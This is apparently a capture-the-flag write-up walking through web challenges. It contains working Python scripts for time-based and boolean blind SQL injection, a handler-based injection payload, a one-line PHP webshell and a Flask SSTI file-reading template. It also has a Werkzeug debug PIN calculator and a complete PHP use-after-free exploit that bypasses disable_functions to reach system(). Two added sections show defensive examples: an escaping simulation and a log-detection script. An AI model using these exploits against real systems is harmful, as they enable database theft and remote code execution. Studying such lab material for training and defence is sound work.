Charity CTF

day1

Sign-in

  • Watch the video; the flag is shown at the end

code_in_morse

  • First decode the Morse with CyberChef to obtain an image
  • Scanning that image yields a second image
  • F5 steganography on the second image gives the flag

web

  • Log in with the weak credentials admin / admin888
  • The search page has an injection point; run sqlmap against it with the session cookie configured and dump the data directly

ezupload

  • Upload a one-line PHP webshell
  • Run bash -c /readflag > tmp
  • Run cat tmp

day2

easysqli_copy

  • Code audit: a wide-byte injection gets ' past the escaping, and time-based blind injection then extracts the data; build a payload that closes the original statement
  • select is filtered, but concat + char can assemble the string select
  • set + prepare + execute is used to run the assembled statement and read the data
  • First read the table name table1, then the column name fllllll4g, then brute-force the flag one character at a time

import requests

url = ''
res = ''
for i in range(1, 43):
    for s in range(45, 126):
        # Guess character i of the column; a 10 s sleep means the guess matched
        t1 = 'select if(ascii(substr((select fllllll4g from table1),{},1))={},sleep(10),1)'.format(i, s)
        # Encode the statement as char(...) so the literal word select never appears
        t2 = ''
        for k in t1:
            t2 += 'char({}),'.format(ord(k))
        t3 = "set @t1=concat({});PREPARE t2 FROM @t1;EXECUTE t2;||{}%271{}%27={}%271".format(t2[:-1], "%df", "%df", "%df")
        payload = '?id=1{}%27;{}'.format('%df', t3)
        try:
            re1 = requests.get(url + payload, timeout=5)
        except Exception as e:
            # The request timed out, so the sleep fired and the character is s
            res += chr(s)
            print(res)
            break
print('res:' + res)
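The wide-byte step above works because byte-wise escaping is undone when the server decodes the query as GBK. The following is an added example, not the writeup's code: it simulates that failure next to a charset-aware alternative that rejects the stray lead byte; the table name t, the function names and the constructed payload are assumptions.

```python
# Added example (not from the writeup): why byte-wise escaping fails under a GBK
# connection charset, and a charset-aware alternative that rejects the stray byte.

def escape_bytes(raw: bytes) -> bytes:
    """Charset-unaware escaping in the style of PHP's addslashes()."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C, 0x00):   # ' " \ NUL
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def unescaped_quotes(sql: str) -> int:
    """Count single quotes not preceded by a backslash, i.e. quotes that
    delimit string literals. Two is normal for one quoted value; three
    means the attacker-controlled quote ended the literal early."""
    return sum(1 for i, ch in enumerate(sql)
               if ch == "'" and (i == 0 or sql[i - 1] != "\\"))

def build_query_unsafe(user_input: bytes, conn_charset: str) -> str:
    """Escape on raw bytes, then let the server decode under its charset.
    Under GBK the lead byte 0xDF swallows the inserted 0x5C backslash."""
    sql = b"SELECT * FROM t WHERE id='" + escape_bytes(user_input) + b"'"
    return sql.decode(conn_charset, errors="replace")

def build_query_safe(user_input: bytes, conn_charset: str) -> str:
    """Decode strictly first and escape on characters, as a charset-aware
    escaper (or a parameterised query) would. A lone 0xDF is rejected
    with UnicodeDecodeError instead of being silently merged."""
    text = user_input.decode(conn_charset)
    escaped = text.replace("\\", "\\\\").replace("'", "\\'")
    return "SELECT * FROM t WHERE id='" + escaped + "'"

# Constructed input: a lone GBK lead byte followed by a quote (the %df%27 trick).
PAYLOAD = b"1\xdf' or 1=1 -- "

if __name__ == "__main__":
    for cs in ("latin-1", "gbk"):
        q = build_query_unsafe(PAYLOAD, cs)
        print(cs, unescaped_quotes(q), q)
```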

Ezsqli

  • Testing shows 8 || 1=1 echoes Nu1L while 8 || 1=0 echoes nothing, so boolean-based blind injection is possible
  • Testing shows in and union select are filtered
  • First enumerate the tables; since in is filtered, use select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),{},1)
  • This gives the table name f1ag_1s_h3r3_hhhhh
  • The data is extracted with column-name-less injection; the reference payload is (select 'admin','admin')>(select * from users limit 1)
  • Build the final payload

import requests
from lxml import etree

def get_data(payload):
    url = ''
    data = {'id': payload}
    req = requests.post(url, data=data)
    data = req.text
    return data

res = ''
for i in range(1, 100):
    flag = 0
    for j in range(45, 126):
        # Hex-encode the known prefix plus the current guess
        a1 = str(hex(j)).replace('0x', '')
        a2 = ''
        for k in res:
            a2 += str(hex(ord(k))).replace('0x', '')
        # f1ag_1s_h3r3_hhhhh
        payload = "id=9|| (( select 1,0x{} )> (select * from (f1ag_1s_h3r3_hhhhh)))".format(a2 + a1)
        # print(payload)
        data = get_data(payload)
        if 'hacker' in data:
            exit(-1)
        if 'Nu1L' in data:
            # The tuple comparison became true, so the real character is one less than the guess
            print(chr(j - 1))
            res += chr(j - 1)
            flag = 1
            print(res)
            break
    if flag:
        pass
    else:
        break
print(res)

blacklist

  • Similar to the 随便注 challenge from 强网杯 (QWB)
  • But the 随便注 approach only yields the table and column names
  • So try handler instead
  • Build the payload inject=1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;
  • This returns the flag

day3

Flaskapp

  • Use the base64decode feature for SSTI (server-side template injection) and read files through the template

  • {{config}} (submitted base64-encoded as e3tjb25maWd9fQ==) leaks 'SECRET_KEY': 's_e_c_r_e_t_k_e_y'
  • The file-reading template, likewise submitted base64-encoded:
    {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/passwd', 'r').read() }}{% endif %}{% endfor %}
  • The same template pointed at /sys/class/net/eth0/address returns 02:42:ac:12:00:06, which is 2485377957894 as a decimal integer (the value uuid.getnode() would return)
  • Pointed at /proc/self/cgroup it returns 12:perf_event:/docker/97e3793194a6e8c1ea3c5081158f336f3f46797be8f44207ee5ed3b49f85ea1f
  • Use the leaked values to compute the Werkzeug debugger PIN

import hashlib
from itertools import chain

probably_public_bits = [
    'flaskweb',  # username
    # 'flask.app',  # modname
    'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.7/site-packages/flask/app.py'  # getattr(mod, '__file__', None)
]
private_bits = [
    # str(uuid.getnode()): /sys/class/net/ens33/address or /sys/class/net/eth0/address
    # 02:42:ac:16:00:06
    '2485377957894',
    # get_machine_id(): /etc/machine-id or /proc/self/cgroup, e.g. 6afeacdf-afcf-4552-8502-719172374dda
    '97e3793194a6e8c1ea3c5081158f336f3f46797be8f44207ee5ed3b49f85ea1f'
]

# Same derivation as Werkzeug's get_pin_and_cookie_name()
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num
print(rv)
  • Use the PIN to unlock the debug console
  • Read the flag from the console

import os
os.listdir('/')
open('jibuqingle.txt', 'r').read()

easy_thinking

  • Testing shows the target runs ThinkPHP 6 (tp6)
  • A search turns up an arbitrary file operation vulnerability in tp6
  • Testing confirms the /runtime/session/ directory exists
  • So change the session ID so that it ends in .php
  • Looking at the session file shows it stores the search history
  • Search for <?php @eval($_GET['rdd']);?> in the search box
  • Then connect to the resulting shell
  • Running phpinfo() shows that many functions are disabled
  • So there is no direct command execution
  • Consider a bypass; use a disable_functions bypass script from another player
  • Finally use the copy function to fetch the script from a remote host
  • Run the script to get the flag

<?php
//pwn("/readflag");
@pwn($_GET['rdd']);
function pwn($cmd) {global $abc, $helper;function str2ptr(&$str, $p = 0, $s = 8) {$address = 0;for($j = $s-1; $j >= 0; $j--) {$address <<= 8;$address |= ord($str[$p+$j]);}return $address;}function ptr2str($ptr, $m = 8) {$out = "";for ($i=0; $i < $m; $i++) {$out .= chr($ptr & 0xff);$ptr >>= 8;}return $out;}function write(&$str, $p, $v, $n = 8) {$i = 0;for($i = 0; $i < $n; $i++) {$str[$p + $i] = chr($v & 0xff);$v >>= 8;}}function leak($addr, $p = 0, $s = 8) {global $abc, $helper;write($abc, 0x68, $addr + $p - 0x10);$leak = strlen($helper->a);if($s != 8) { $leak %= 2 << ($s * 8) - 1; }return $leak;}function parse_elf($base) {$e_type = leak($base, 0x10, 2);$e_phoff = leak($base, 0x20);$e_phentsize = leak($base, 0x36, 2);$e_phnum = leak($base, 0x38, 2);for($i = 0; $i < $e_phnum; $i++) {$header = $base + $e_phoff + $i * $e_phentsize;$p_type = leak($header, 0, 4);$p_flags = leak($header, 4, 4);$p_vaddr = leak($header, 0x10);$p_memsz = leak($header, 0x28);if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write# handle pie$data_addr = $e_type == 2 ? 
$p_vaddr : $base + $p_vaddr;$data_size = $p_memsz;} else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec$text_size = $p_memsz;}}if(!$data_addr || !$text_size || !$data_size)return false;return [$data_addr, $text_size, $data_size];}function get_basic_funcs($base, $elf) {list($data_addr, $text_size, $data_size) = $elf;for($i = 0; $i < $data_size / 8; $i++) {$leak = leak($data_addr, $i * 8);if($leak - $base > 0 && $leak - $base < $text_size) {$deref = leak($leak);# 'constant' constant checkif($deref != 0x746e6174736e6f63)continue;} else continue;$leak = leak($data_addr, ($i + 4) * 8);if($leak - $base > 0 && $leak - $base < $text_size) {$deref = leak($leak);# 'bin2hex' constant checkif($deref != 0x786568326e6962)continue;} else continue;return $data_addr + $i * 8;}}function get_binary_base($binary_leak) {$base = 0;$start = $binary_leak & 0xfffffffffffff000;for($i = 0; $i < 0x1000; $i++) {$addr = $start - 0x1000 * $i;$leak = leak($addr, 0, 7);if($leak == 0x10102464c457f) { # ELF headerreturn $addr;}}}function get_system($basic_funcs) {$addr = $basic_funcs;do {$f_entry = leak($addr);$f_name = leak($f_entry, 0, 6);if($f_name == 0x6d6574737973) { # systemreturn leak($addr + 8);}$addr += 0x20;} while($f_entry != 0);return false;}class ryat {var $ryat;var $chtg;function __destruct(){$this->chtg = $this->ryat;$this->ryat = 1;}}class Helper {public $a, $b, $c, $d;}if(stristr(PHP_OS, 'WIN')) {die('This PoC is for *nix systems only.');}$n_alloc = 10; # increase this value if you get segfaults$contiguous = [];for($i = 0; $i < $n_alloc; $i++)$contiguous[] = str_repeat('A', 79);$poc = 'a:4:{i:0;i:1;i:1;a:1:{i:0;O:4:"ryat":2:{s:4:"ryat";R:3;s:4:"chtg";i:2;}}i:1;i:3;i:2;R:5;}';$out = unserialize($poc);gc_collect_cycles();$v = [];$v[0] = ptr2str(0, 79);unset($v);$abc = $out[2][0];$helper = new Helper;$helper->b = function ($x) { };if(strlen($abc) == 79 || strlen($abc) == 0) {die("UAF failed");}# leaks$closure_handlers = str2ptr($abc, 0);$php_heap = str2ptr($abc, 
0x58);$abc_addr = $php_heap - 0xc8;# fake valuewrite($abc, 0x60, 2);write($abc, 0x70, 6);# fake referencewrite($abc, 0x10, $abc_addr + 0x60);write($abc, 0x18, 0xa);$closure_obj = str2ptr($abc, 0x20);$binary_leak = leak($closure_handlers, 8);if(!($base = get_binary_base($binary_leak))) {die("Couldn't determine binary base address");}if(!($elf = parse_elf($base))) {die("Couldn't parse ELF header");}if(!($basic_funcs = get_basic_funcs($base, $elf))) {die("Couldn't get basic_functions address");}if(!($zif_system = get_system($basic_funcs))) {die("Couldn't get zif_system address");}# fake closure object$fake_obj_offset = 0xd0;for($i = 0; $i < 0x110; $i += 8) {write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));}# pwnwrite($abc, 0x20, $abc_addr + $fake_obj_offset);write($abc, 0xd0 + 0x38, 1, 4); # internal func typewrite($abc, 0xd0 + 0x68, $zif_system); # internal func handler($helper->b)($cmd);exit();
}
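As an added, defender-side example that is not part of the writeup, the following detector flags in web access logs the request patterns that easysqli_copy, blacklist and easy_thinking rely on: the sleep()-based timing probe, the set/prepare/execute statement assembled from char() calls, the handler bypass, a PHP tag in a search parameter, and a PHPSESSID that is not 32 alphanumerics. The log format, rule names and sample lines are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Rules applied to the URL-decoded request target; output order follows this list.
RULES = [
    ("time_based_sqli", re.compile(r"\bsleep\s*\(", re.I)),
    ("prepared_stmt_bypass", re.compile(r"\b(?:prepare\s+\w+\s+from\s*@|execute\s+\w+)", re.I)),
    ("char_encoded_sql", re.compile(r"(?:char\s*\(\s*\d+\s*\)\s*,\s*){2,}char\s*\(\s*\d+\s*\)", re.I)),
    ("handler_bypass", re.compile(r"\bhandler\s+\w+\s+(?:open|read|close)\b", re.I)),
    ("php_tag_in_param", re.compile(r"<\?php", re.I)),
]
# A legitimate ThinkPHP session id is 32 alphanumerics; a ".php" suffix is the tell here.
SESSION_ID = re.compile(r"[A-Za-z0-9]{32}")
# Constructed combined-style log format whose last quoted field is the Cookie header.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
                    r'\d{3} \S+ "[^"]*" "[^"]*" "(?P<cookie>[^"]*)"$')

def analyze_line(line: str) -> list:
    """Return the names of the rules that one access-log line triggers."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    target = unquote_plus(m["target"])          # decode %xx and + before matching
    hits = [name for name, rx in RULES if rx.search(target)]
    cookies = dict(c.strip().split("=", 1) for c in m["cookie"].split(";") if "=" in c)
    sid = cookies.get("PHPSESSID")
    if sid is not None and not SESSION_ID.fullmatch(sid):
        hits.append("malformed_session_id")
    return hits

def analyze_log(lines: list) -> list:
    return [analyze_line(line) for line in lines]

# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Feb/2020:10:00:01 +0000] "GET /?id=1%df%27;set%20@t1=concat(char(115),char(101),'
    'char(108));PREPARE%20t2%20FROM%20@t1;EXECUTE%20t2; HTTP/1.1" 200 512 "-" "python-requests/2.22.0" "-"',
    '10.0.0.5 - - [01/Feb/2020:10:00:02 +0000] "GET /?id=1%20and%20if(1=1,sleep(10),1) HTTP/1.1" 200 512 '
    '"-" "python-requests/2.22.0" "-"',
    '10.0.0.6 - - [01/Feb/2020:10:03:00 +0000] "GET /?inject=1%27;handler%20FlagHere%20open;handler%20'
    'FlagHere%20read%20first;handler%20FlagHere%20close; HTTP/1.1" 200 200 "-" "curl/7.68.0" "-"',
    '10.0.0.7 - - [01/Feb/2020:10:05:00 +0000] "GET /search?q=%3C%3Fphp+%40eval(%24_GET%5B%27rdd%27%5D)%3B%3F%3E '
    'HTTP/1.1" 200 300 "-" "Mozilla/5.0" "PHPSESSID=0123456789abcdef0123456789abcdef.php"',
    '10.0.0.9 - - [01/Feb/2020:10:06:00 +0000] "GET /search?q=hello HTTP/1.1" 200 300 "-" "Mozilla/5.0" '
    '"PHPSESSID=0123456789abcdef0123456789abcdef"',
]
if __name__ == "__main__":
    for line, hits in zip(SAMPLE_LOG, analyze_log(SAMPLE_LOG)):
        print(hits or "clean", line.split('"')[1])
```

Only the last sample line is clean; everything else is flagged by at least one rule, and the session-id check fires independently of the request target.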
